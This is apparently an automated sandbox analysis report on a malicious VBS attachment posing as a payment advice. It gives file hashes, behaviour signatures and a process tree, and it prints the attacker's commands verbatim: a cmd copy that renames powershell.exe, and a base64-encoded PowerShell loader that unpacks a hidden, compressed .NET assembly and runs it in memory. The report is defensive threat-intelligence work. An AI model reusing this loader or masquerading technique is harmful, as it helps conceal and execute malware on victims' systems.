Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 09:51
Static task
static1
Behavioral task
behavioral1
Sample
PaymentAdvice-1629043.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
PaymentAdvice-1629043.vbs
Resource
win10v2004-20241007-en
General
-
Target
PaymentAdvice-1629043.vbs
-
Size
2.3MB
-
MD5
9d7aa394cb39af2a434eb3036a35bb47
-
SHA1
bfcb9a3f1dcbcfce2f66f4c5c0e8dbada27dbd9f
-
SHA256
490022706b76b904dfe979627f775cc2be0cd6a10ae623989cf2118026a21bea
-
SHA512
3b2da959a16b915d52ceadb8336fc5478e7d579a38cf59fe34f15744a0017ea9907bf5b62b4670ea123b223a0af7f3e96ab03d132055a1afd8e6983a4f856033
-
SSDEEP
24576:dGPQzVpL6fvkC6MugzlGbhhkg6XCoCK86uTK6ClN3Br6kXIEHIQCobtMvQ8rAOSP:dGcJXxTqb38jR/4RzGfFVvC
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3044 2372 cmd.exe 30 -
Executes dropped EXE 1 IoCs
pid Process 2796 PaymentAdvice-1629043.vbs.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PaymentAdvice-1629043.vbs.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2796 PaymentAdvice-1629043.vbs.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2796 PaymentAdvice-1629043.vbs.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2100 wrote to memory of 2796 2100 WScript.exe 33 PID 2100 wrote to memory of 2796 2100 WScript.exe 33 PID 2100 wrote to memory of 2796 2100 WScript.exe 33 PID 2100 wrote to memory of 2796 2100 WScript.exe 33
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe"C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" -enc JABKAG0AcgBwAHAAYwB1AGIAcgBtAG0AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQASABvAHMAZABjAHQAaABsAHYAdABvACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQASgBtAHIAcABwAGMAdQBiAHIAbQBtACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAFcAawBmAGMAbABsAGgAagB4ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAEgAbwBzAGQAYwB0AGgAbAB2AHQAbwAuAFIAZQBwAGwAYQBjAGUAKAAnAFIARQBNACAAJwAsACAAJwAnACkALgBSAGUAcABsAGEAYwBlACgAJwBAACcALAAgACcAQQAnACkAKQA7ACQAQwBnAGwAYQBrAGgAegByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAIAAsACAAJABXAGsAZgBjAGwAbABoAGoAeAAgACkAOwAkAEMAbQBqAHAAegB5AHYAcABjAHMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFUAbgB0AGkAcABmACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAEMAZwBsAGEAawBoAHoAcgAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAVQBuAHQAaQBwAGYALgBDAG8AcAB5AFQAbwAoACAAJABDAG0AagBwAHoAeQB2AHAAYwBzACAAKQA7ACQAVQBuAHQAaQBwAGYALgBDAGwAbwBzAGUAKAApADsAJABDAGcAbABhAGsAaAB6AHIALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABXAGsAZgBjAGwAbABoAGoAeAAgAD0AIAAkAEMAbQBqAHAAegB5AHYAcABjAHMALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAFcAawBmAGMAbABsAGgAagB4ACkAOwAgACQATwByAHkAbABnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoACQAVwBrAGYAYwBsAGwAaABqAHgAKQA7ACAAJABHAGIAZwBrAGYAdABxAHAAIAA9ACAAJABPAHIAeQBsAGcALgBFAG4AdAByAHkAUABvAGkAbgB0ADsAIABbAFMAeQBzAHQAZQBtAC4ARABlAGwAZQBnAGEAdABlAF0AOgA6AEMAcgBlAGEAdABlAEQAZQBsAGUAZwBhAHQAZQAoAFsAQQBjAHQAaQBvAG4AXQAsACAAJABHAGIAZwBrAGYAdABxAHAALgBEAGUAYwBsAGEAcgBpAG4AZwBUAHkAcABlACwAIAAkAEcAYgBnAGsAZgB0AHEAcAAuAE4AYQBtAGUAKQAuAEQAeQBuAGEAbQBpAGMASQBuAHYAbwBrAGUAKAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2796
-
-
C:\Windows\system32\cmd.execmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\Admin\AppData\Local\Temp\PaymentAdvice-1629043.vbs.exe" /Y1⤵
- Process spawned unexpected child process
PID:3044
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f